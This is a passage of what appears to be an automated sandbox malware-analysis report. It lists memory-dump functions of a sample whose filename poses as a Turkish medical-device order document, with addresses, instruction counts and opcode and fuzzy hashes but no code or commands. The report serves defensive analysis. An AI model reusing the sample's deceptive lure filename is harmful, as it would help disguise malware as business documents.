                                                                                                                          Function 0622ADF1 Relevance: .1, Instructions: 54COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4340ca83da55ab2d24f8ccf43ee02bab69e1c880a3cb2ec98b31158f65282a3d
                                                                                                                          • Instruction ID: ce5ffa8c1221dfc069137f7ae2387e0e31cdde7325273aff1906729f48779a0c
                                                                                                                          • Opcode Fuzzy Hash: 4340ca83da55ab2d24f8ccf43ee02bab69e1c880a3cb2ec98b31158f65282a3d
                                                                                                                          • Instruction Fuzzy Hash: F7016871E293A3BFC7832B24D8140E97FF0DB8224071908F7D885E7592E160490ACB91
                                                                                                                          Function 0120D367 Relevance: .1, Instructions: 53COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1339204549.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_120d000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                                                          • Instruction ID: 6ab5d216756b5f5e2da62db221a25c72afe61a7c5c1c5fa3cb419b9e745774f5
                                                                                                                          • Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                                                          • Instruction Fuzzy Hash: 3311BB75504284CFCB12CF94D5C4B15BFA1FB84318F24C6A9D9494B697C33AE44ACF62
                                                                                                                          Function 0120D1AF Relevance: .1, Instructions: 53COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1339204549.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_120d000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                                                          • Instruction ID: ded0f2364f9f6833aecf0480ced1912f04324a2e0f55894e402620a0b15f302b
                                                                                                                          • Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                                                          • Instruction Fuzzy Hash: 1311DD75505284CFCB12CF94D5C4B15BFA1FB84328F24C6A9D9494B697C33AD80ACBA1
                                                                                                                          Function 0622C433 Relevance: .1, Instructions: 52COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 786c66213cb8c43f6dbeef07a7d8736b701cdcb1ee080ef7cd15b1c52cd4a2de
                                                                                                                          • Instruction ID: 85d3917a1eedfbe91563520f765afb744b8f2170d116370d59d810896e0cfa12
                                                                                                                          • Opcode Fuzzy Hash: 786c66213cb8c43f6dbeef07a7d8736b701cdcb1ee080ef7cd15b1c52cd4a2de
                                                                                                                          • Instruction Fuzzy Hash: B5014C717242615FC794DB69C8508AEBBFAEF9A61031544AAE541CB361CA719D01CB60
                                                                                                                          Function 06229708 Relevance: .0, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a620d4b9cc6740e4893fbbda6e0c9931d5488f27fe81c70932db7d8c0508b030
                                                                                                                          • Instruction ID: 3d52534d9c315bf933c2c1f3add3c9f40c5627da0b60e14e04135f2e995dfd6d
                                                                                                                          • Opcode Fuzzy Hash: a620d4b9cc6740e4893fbbda6e0c9931d5488f27fe81c70932db7d8c0508b030
                                                                                                                          • Instruction Fuzzy Hash: 9F018F317241219FD394DB6EC88487EBBEAFF8961031444AAF901CB370CA71DC00CB94
                                                                                                                          Function 0622E1E8 Relevance: .0, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d02e2c3fcd69f906cd947ee347898bcce76763728b0210eb34086b956e8875d1
                                                                                                                          • Instruction ID: 9725c75154c34fd52169511bd8c460b17c7afa3521d05fd2e5c46db9c0b8798c
                                                                                                                          • Opcode Fuzzy Hash: d02e2c3fcd69f906cd947ee347898bcce76763728b0210eb34086b956e8875d1
                                                                                                                          • Instruction Fuzzy Hash: 9F01F532D1031AAFCB51EAB8DC414DEBBB9FFD9300B11872AE44167551EB30A595CBD0
                                                                                                                          Function 0622F010 Relevance: .0, Instructions: 47COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 741f509701003e502109eac8af66246f279835b51c40af77e70ae47c677c89e4
                                                                                                                          • Instruction ID: 0034460697fca1cc38b1932f22636f9a67527465e744c72d8f51dac2e2731335
                                                                                                                          • Opcode Fuzzy Hash: 741f509701003e502109eac8af66246f279835b51c40af77e70ae47c677c89e4
                                                                                                                          • Instruction Fuzzy Hash: 6411E130E1025B9FDB44EFB8C9507AEBBB1AF49304F10852AC811F7385EB788A45CB81
                                                                                                                          Function 07654DD0 Relevance: .0, Instructions: 43COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9d996dfc439c52db5617e5b7bc6e4c0ac161f4822bd8053e8c4fe71a2749bc83
                                                                                                                          • Instruction ID: bec8b5458fe5dbfdc33fd2f61a426c8115725799ca986b7f8ec86e7708516947
                                                                                                                          • Opcode Fuzzy Hash: 9d996dfc439c52db5617e5b7bc6e4c0ac161f4822bd8053e8c4fe71a2749bc83
                                                                                                                          • Instruction Fuzzy Hash: 11016D3260835AAFCB064F64E80489FBFBAEF99210714802BFA85C3351DB758D21DB91
                                                                                                                          Function 0622F020 Relevance: .0, Instructions: 43COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f7891b6dd17fb81b9371bd7dae7385add525db57f25552a06df751d613f7f523
                                                                                                                          • Instruction ID: 427a08903a24f6dde00d148cddb999efeeca1a480bf34ef429ef6909fa7c05d7
                                                                                                                          • Opcode Fuzzy Hash: f7891b6dd17fb81b9371bd7dae7385add525db57f25552a06df751d613f7f523
                                                                                                                          • Instruction Fuzzy Hash: 2F019E30E1021A9FDB44EFA8C9517AEBBB1EF49304F108529C915F7394EB789A05CBC1
                                                                                                                          Function 07657D58 Relevance: .0, Instructions: 41COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8bbbe3d03edfc91eb64e0d055191bee8cff67fbb4de402fd8373b9fdfffa69ca
                                                                                                                          • Instruction ID: 69fa865b5f027d9e6a85b6f83abf33feafe3e0763766d4340b4bafaa336e3035
                                                                                                                          • Opcode Fuzzy Hash: 8bbbe3d03edfc91eb64e0d055191bee8cff67fbb4de402fd8373b9fdfffa69ca
                                                                                                                          • Instruction Fuzzy Hash: 0501287096C3C48FC701D674C4142BA7FB29B43309F4481AEC8464F683C77A9887EB21
                                                                                                                          Function 06229328 Relevance: .0, Instructions: 41COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a95bd61d3ea6fc7ae51d45d12525677bd82ce313de5fae6fa4dfe1c5945ce87d
                                                                                                                          • Instruction ID: 3ebc9babaa72cf028706ac77f12890d9cb12e9082b934aace56858f7b91a28b4
                                                                                                                          • Opcode Fuzzy Hash: a95bd61d3ea6fc7ae51d45d12525677bd82ce313de5fae6fa4dfe1c5945ce87d
                                                                                                                          • Instruction Fuzzy Hash: 0C01F431A146149FCB12EB69D88489EBFB9EF8621070001AFF1459B321DA305D05CBE2
                                                                                                                          Function 0622E1F8 Relevance: .0, Instructions: 39COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 676b19d5d69f17f603f8374492df43fd202a5fca5f9f00144d7a1cf7a2ca1504
                                                                                                                          • Instruction ID: 88151dda2eed9db26017c2c43875bfe8c10d49dd2be418e162122f7357b9be8d
                                                                                                                          • Opcode Fuzzy Hash: 676b19d5d69f17f603f8374492df43fd202a5fca5f9f00144d7a1cf7a2ca1504
                                                                                                                          • Instruction Fuzzy Hash: ED01863291071AABCF10EEA5DC444DEFB7AFFD5304F118729E44527150EB71A595CB90
                                                                                                                          Function 0622EF80 Relevance: .0, Instructions: 39COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3acb53d042dd666daffb20d1c87dfc16569dedba3cfa897c3701cfdfb440bf71
                                                                                                                          • Instruction ID: ea90e154ab5978cae1759c5be5c33c6967fa06c63295636aa96f22515d55764c
                                                                                                                          • Opcode Fuzzy Hash: 3acb53d042dd666daffb20d1c87dfc16569dedba3cfa897c3701cfdfb440bf71
                                                                                                                          • Instruction Fuzzy Hash: 2DF05E317606219FC794DB2DD854DAA77E9EF8EA1031640FAF509CB372CA61DC02CB60
                                                                                                                          Function 07658F1C Relevance: .0, Instructions: 38COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 094c4715c4d0cebdcdce0c53eadb7a1790c1d6e17bf335c8fcab9c8a00bd8ed5
                                                                                                                          • Instruction ID: 48640f464f227a6ab03987e42ea5c26c6f5f856f3b752105981ce0ed72726b72
                                                                                                                          • Opcode Fuzzy Hash: 094c4715c4d0cebdcdce0c53eadb7a1790c1d6e17bf335c8fcab9c8a00bd8ed5
                                                                                                                          • Instruction Fuzzy Hash: 41F0B4E192D286DFC31196A468211B27FF5997B150F4800CBEC47CFD92D5284507A3B3
                                                                                                                          Function 0622E2CE Relevance: .0, Instructions: 37COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e3211e2b09050a33bfebbaf00140f8035ae654b651e79856e6ac7a9244fabd33
                                                                                                                          • Instruction ID: eeaefbdf63fbe66849d29fa56988d0674e974242999179bfad1d829130205977
                                                                                                                          • Opcode Fuzzy Hash: e3211e2b09050a33bfebbaf00140f8035ae654b651e79856e6ac7a9244fabd33
                                                                                                                          • Instruction Fuzzy Hash: 86F03034B502119FD7949B6CD848ABD77EAAFCD611B1580BAE509CB370CF70DC028B90
                                                                                                                          Function 07654DE0 Relevance: .0, Instructions: 36COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 51a0ac9eb2be00e02d00fa68b1cc1ba1cd24cb9a4f9784bc3830d925b3b63164
                                                                                                                          • Instruction ID: f33c82724b1c36830cef3510a9d6830aceb2030cb884dca64be5b7ac7ad695a7
                                                                                                                          • Opcode Fuzzy Hash: 51a0ac9eb2be00e02d00fa68b1cc1ba1cd24cb9a4f9784bc3830d925b3b63164
                                                                                                                          • Instruction Fuzzy Hash: C4F01235740219AF9B055F55EC4486FBFAAFB9C2107108026FE15C3350DF758D219B90
                                                                                                                          Function 0622E2D0 Relevance: .0, Instructions: 36COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f321b70b19714ffdfd3e804e6f959d64811605c0326e2a43cc6cef5e1434d69a
                                                                                                                          • Instruction ID: 636dc2a447e6f973622aeefd955493a7d5fa39c2efd9c9024e5f7557b335f56f
                                                                                                                          • Opcode Fuzzy Hash: f321b70b19714ffdfd3e804e6f959d64811605c0326e2a43cc6cef5e1434d69a
                                                                                                                          • Instruction Fuzzy Hash: 19F054347501115FD694976DC848ABD77DAAFCD611B1580BAE509CB370CF70DC0287A0
                                                                                                                          Function 07657D49 Relevance: .0, Instructions: 35COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4af780b7c7407c79255438a220af10ebe6f1983604f14c61e46df2033845a6d4
                                                                                                                          • Instruction ID: 8156f04448d7ce3c74f58795397a7cccc3ec0db6a33b577954e1cade89b12e70
                                                                                                                          • Opcode Fuzzy Hash: 4af780b7c7407c79255438a220af10ebe6f1983604f14c61e46df2033845a6d4
                                                                                                                          • Instruction Fuzzy Hash: D4F0F6705AE2859FC3119A30E4946757F329B83309F18C2EAD99A4F287C73BC543DB62
                                                                                                                          Function 07652AC7 Relevance: .0, Instructions: 35COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 582ccf8f1706e0bcf8e9c2c45e3c271fb68c504a1f03fa7f19202dd3568f197d
                                                                                                                          • Instruction ID: 6f94a521c72187cd4c338329069e5cc7d9abbedcaf4118ef9b233b2f90019ca1
                                                                                                                          • Opcode Fuzzy Hash: 582ccf8f1706e0bcf8e9c2c45e3c271fb68c504a1f03fa7f19202dd3568f197d
                                                                                                                          • Instruction Fuzzy Hash: B1F0E2B67093409FD7228F26E880586FBE4EF8A271704C5ABE49DC7A51DA308905C7A0
                                                                                                                          Function 07652800 Relevance: .0, Instructions: 33COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: da49ae89f517da2355afbf72e34e5fff4927610edc4a08e11a79f1cc73ddabe2
                                                                                                                          • Instruction ID: e395d25f89116dbcd315bc3de6f7d11e3614d21a4730c741141e9e85aaae28b3
                                                                                                                          • Opcode Fuzzy Hash: da49ae89f517da2355afbf72e34e5fff4927610edc4a08e11a79f1cc73ddabe2
                                                                                                                          • Instruction Fuzzy Hash: B1F0A731605340AFC3261F30E9199973F76EF86711B19806AF54ACB291CB34C80ACBA1
                                                                                                                          Function 07652810 Relevance: .0, Instructions: 33COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5562b78fe4ee658b2898481b80f622c2f5ce61716e0c150f079aec2ebbd52820
                                                                                                                          • Instruction ID: e41a9d3e98189c6b1086c6133e730f01a18a88d21281712b58d6cbc2dda34913
                                                                                                                          • Opcode Fuzzy Hash: 5562b78fe4ee658b2898481b80f622c2f5ce61716e0c150f079aec2ebbd52820
                                                                                                                          • Instruction Fuzzy Hash: B3F012767002049BD3189F69E404AA77BA6FBD5761F10C03AF659CB340DA35D806CBA0
                                                                                                                          Function 07659D78 Relevance: .0, Instructions: 32COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 333f39ed6e3eb1f99d29434228ce32508347df3d2886fd5effa2c3e6256c68b7
                                                                                                                          • Instruction ID: 05caba6e3d1e7451e563984f07500f41f9798ea1995be20325a72319925fe885
                                                                                                                          • Opcode Fuzzy Hash: 333f39ed6e3eb1f99d29434228ce32508347df3d2886fd5effa2c3e6256c68b7
                                                                                                                          • Instruction Fuzzy Hash: 1DF020B1838F00C3EB183234840E676BFA6A753320F044666EC4B06883E922B813E292
                                                                                                                          Function 0765BBED Relevance: .0, Instructions: 31COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 05446146ff8c55b73b92887056ed6f028b679997a1fe0737263c4717dd00d4b4
                                                                                                                          • Instruction ID: e8a5ec34504e569f0e849a938c9ac1a944fd6bbd2dfdd4c7ce59019514117b61
                                                                                                                          • Opcode Fuzzy Hash: 05446146ff8c55b73b92887056ed6f028b679997a1fe0737263c4717dd00d4b4
                                                                                                                          • Instruction Fuzzy Hash: 47F01278A101089FDB54EB94D491B9EBBF2FF89210F388559E94997348DA31AC43CB91
                                                                                                                          Function 0765AEEA Relevance: .0, Instructions: 30COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 3b6f22fde936500f19211e2b2d90b6f451bf3667865e791ffab4f0ee76b8eb39
                                                                                                                          • Instruction ID: 1fa616cd9f9d6967325214a321e54c480b8cc879fcb46d28a10df4ad1b318703
                                                                                                                          • Opcode Fuzzy Hash: 3b6f22fde936500f19211e2b2d90b6f451bf3667865e791ffab4f0ee76b8eb39
                                                                                                                          • Instruction Fuzzy Hash: 7BF09670A45345DFDB119BB0DC4D9ADBB72AF56300F008256EA165A2D1C7704816DB15
                                                                                                                          Function 06223459 Relevance: .0, Instructions: 30COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7c221b37d6fbeede85b2e66061d970365a15c511263eabb39943b93618d79dc2
                                                                                                                          • Instruction ID: 91444cc3ade7070f9c350e200f7d0d8954bb9c72e4d2d8bce7a08327969c0396
                                                                                                                          • Opcode Fuzzy Hash: 7c221b37d6fbeede85b2e66061d970365a15c511263eabb39943b93618d79dc2
                                                                                                                          • Instruction Fuzzy Hash: 8AF0E531525389BFCF229FA5A808A8A7F79EF55210F018072FD0486142E6B58164C6B2
                                                                                                                          Function 062211A7 Relevance: .0, Instructions: 30COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 60d900464d9ab9cb7aa841fdf8f370b02e45602b34c883a4e5ad1eb70116b9fe
                                                                                                                          • Instruction ID: 3fcde1f159ad84302d1fefe6dc1f541efd65d39d6d097433e0833c61457f7a7c
                                                                                                                          • Opcode Fuzzy Hash: 60d900464d9ab9cb7aa841fdf8f370b02e45602b34c883a4e5ad1eb70116b9fe
                                                                                                                          • Instruction Fuzzy Hash: 8CF0A079D5020AABC754EFA4E508BAEB3E5EB01245F1046998D09A3241EA304E209781
                                                                                                                          Function 0622E278 Relevance: .0, Instructions: 29COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f1b93fd61c2b0cf82b92cfe76e12d443d81c90ee08af2e18b207a6a3a05db077
                                                                                                                          • Instruction ID: baa829d3308cec4c163967c5fa811fada1aa76f24b88350edb352a2f9605a098
                                                                                                                          • Opcode Fuzzy Hash: f1b93fd61c2b0cf82b92cfe76e12d443d81c90ee08af2e18b207a6a3a05db077
